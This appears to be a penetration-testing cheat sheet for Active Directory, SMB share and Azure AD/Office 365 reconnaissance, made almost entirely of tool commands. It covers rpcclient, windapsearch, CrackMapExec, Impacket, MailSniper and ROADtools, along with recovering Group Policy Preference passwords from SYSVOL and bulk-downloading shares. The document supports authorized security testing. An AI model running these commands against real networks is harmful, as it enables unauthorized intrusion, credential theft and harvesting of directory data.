Domain Recon

Tips

# Enumerate sessions
net session \\computer


Domain Properties

rpcclient

# You can use RPC (rpcclient) to enumerate domain objects
rpcclient -U <user> <IP-DC>

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> srvinfo
rpcclient $> querygroup 0x42
rpcclient $> queryuser 0x42
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo 0x42


enum4linux

# You can use enum4linux to enumerate domain users
# You can also try an anonymous bind
sudo enum4linux domaine.fr
./enum4linux.pl -R 1090-1200


windapsearch

# windapsearch is also a very good tool to perform automated LDAP queries
# Enumerate users
./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 -U
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -U

# enumerate all entries in objectCategory=group
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -G

# Query group membership
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -m <CN/OU>

# Enumerate all domain admins and accounts with equivalent rights
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 --da

# Enumerate all computers
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -C

# Custom search
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -s <stringToSearch>


Pywerview

python pywerview.py get-netuser -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.traya 
python pywerview.py get-netgroup -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.vador


SMB & Share

Basic enumeration

# Enumerate hostname
nmblookup -A <victim_ip>
enum4linux -n <victim_ip>
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>

# Check for null sessions
smbmap -H <victim_ip>

# Checking for vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

Smbclient

# Using smbclient
smbclient -L <IP>
smbclient -U GALACTIC.LAN\\d.vador -L //10.69.88.10

# You can recursively download a folder
smb: > recurse ON
smb: > prompt OFF
smb: > mget *

SYSVOL & MS14-025

# You can browse SMB share using smbclient
# The SYSVOL share contains GPOs; you can look for MS14-025 (GPP passwords)
smbclient -U user //10.34.67.4/SYSVOL
# MS14-025
→ smb: \NORZH.LAN\Policies\{195471B6-B0C6-4AD2-9853-28E2B4E9CEF6}\Machine\Preferences\Groups\Groups.xml
→ gpp-decrypt password

CrackMapExec & Impacket

# Impacket SMB/MSRPC tools
# lookupsids → SID Bruteforce through MSRPC Interface
# samrdump → SAM Remote Interface (MSRPC) to extract system users, available shares, etc.
# services → Used to (start, stop, delete, status, config, list, create, change) services through MSRPC interface
# netview → Get a list of open sessions and keep track of who logged in/off on remote targets
# smbclient → generic SMB client
# rpcdump → This script will dump the list of RPC endpoints and string bindings registered at the target.
# reg → Remote registry manipulation tool through the [MS-RRP] MSRPC Interface.
tool.py domain\user:password@IP <command/parameter>

# You can list all shares on a machine to find potential entry points
cme smb 10.69.88.23 -u user -p password --shares

Defensive

# DEFENSIVE POINT OF VIEW
# You can list active SMB sessions
C:\> net session
# And terminate them
C:\> net session \\[LinuxIPaddr] /del


Azure AD Recon

# Applications using Azure API Management
# Requests are made to:
<name>.azure-api.net

# Documentation and more
<name>.portal.azure-api.net

# Gateway
<name>.azure-api.net

# Dev
<name>.portal.azure-api.net
<name>.developer.azure-api.net

# Management
<name>.management.azure-api.net

# Git
<name>.scm.azure-api.net
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# The o365recon tool can be used (https://github.com/nyxgeek/o365recon)
# It mainly uses the MSOnline PowerShell module

PS> Connect-MsolService
PS> powershell -ep bypass .\o365recon.ps1 -outputfile TEST_OUTPUT

# The -users_detailed flag can be used to query more information about users
# An empty LastDirSyncTime means the user exists only in the cloud

# The id suffixed to the SYNC cloud account is the same id as the MSOL account belonging to the on-premises Active Directory

# You can also list Azure AD roles and members (see the link above)

# MailSniper can also be used to get the Address List
PS C:\> Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName xxxx -Password xxxx -OutFile xxxx

# And associated usernames
PS C:\> Get-ADUsernameFromEWS -EmailList list.txt -ExchHostname outlook.office365.com -Remote
# With admin privileges you can check the MFA status of users
PS C:\> Connect-MsolService
PS C:\> Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_.StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
# ROADTools (https://github.com/dirkjanm/ROADtools)
# It uses an internal, undocumented version of the Microsoft Graph API

PS C:\> roadrecon.exe auth -u user@domain
Tokens were written to .roadtools_auth

PS C:\> roadrecon.exe dump

PS C:\> roadrecon-gui.exe -debug -d .\roadrecon.db
 * Serving Flask app "roadtools.roadrecon.server" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

# Plugin for getting Conditional Access Policies
PS C:\> roadrecon plugin policies